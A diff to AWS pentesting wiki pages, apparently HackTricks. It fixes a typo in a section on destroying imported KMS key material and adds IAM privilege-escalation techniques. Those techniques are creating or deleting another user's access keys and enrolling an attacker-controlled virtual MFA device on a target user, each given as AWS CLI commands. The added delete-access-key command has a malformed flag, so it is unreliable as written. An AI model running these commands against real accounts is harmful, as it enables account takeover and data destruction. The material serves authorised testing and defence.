f

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation/README.md

@@ -113,7 +113,7 @@ There is another way to perform a global KMS Ransomware, which would involve the
 
 ### Delete Keys via kms:DeleteImportedKeyMaterial
 
-With the `kms:DeleteImportedKeyMaterial` permission, an actor can delete the imported key material from CMKs with `Origin=EXTERNAL` (CMKs that have imperted their key material), making them unable to decrypt data. This action is destructive and irreversible unless compatible material is re-imported, allowing an attacker to effectively cause ransomware-like data loss by rendering encrypted information permanently inaccessible.
+With the `kms:DeleteImportedKeyMaterial` permission, an actor can delete the imported key material from CMKs with `Origin=EXTERNAL` (CMKs that have imported their key material), making them unable to decrypt data. This action is destructive and irreversible unless compatible material is re-imported, allowing an attacker to effectively cause ransomware-like data loss by rendering encrypted information permanently inaccessible.
 
 ```bash
 aws kms delete-imported-key-material --key-id <Key_ID>

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md

@@ -35,7 +35,7 @@ aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id
 
 **Impact:** Indirect privilege escalation by enabling more permissions.
 
-### **`iam:CreateAccessKey`**
+### **`iam:CreateAccessKey`, (`iam:DeleteAccessKey`)**
 
 Enables creating access key ID and secret access key for another user, leading to potential privilege escalation.
 
@@ -47,6 +47,29 @@ aws iam create-access-key --user-name <target_user>
 
 **Impact:** Direct privilege escalation by assuming another user's extended permissions.
 
+Note that a user can only have 2 access keys created, so if a user already has 2 access keys you will need the permission `iam:DeleteAccessKey` to detele one of them to be able to create a new one:
+
+```bash
+aws iam delete-access-key --uaccess-key-id <key_id>
+```
+
+### **`iam:CreateVirtualMFADevice` + `iam:EnableMFADevice`**
+
+If you can create a new virtual MFA device and enable it on another user, you can effectively enroll your own MFA for that user and then request an MFA-backed session for their credentials.
+
+**Exploit:**
+
+```bash
+# Create a virtual MFA device (this returns the serial and the base32 seed)
+aws iam create-virtual-mfa-device --virtual-mfa-device-name <mfa_name>
+
+# Generate 2 consecutive TOTP codes from the seed, then enable it for the user
+aws iam enable-mfa-device --user-name <target_user> --serial-number <serial> \
+  --authentication-code1 <code1> --authentication-code2 <code2>
+```
+
+**Impact:** Direct privilege escalation by taking over a user's MFA enrollment (and then using their permissions).
+
 ### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`**
 
 Permits creating or updating a login profile, including setting passwords for AWS console login, leading to direct privilege escalation.
@@ -308,4 +331,3 @@ aws iam put-role-permissions-boundary \
 {{#include ../../../../banners/hacktricks-training.md}}
 
 
-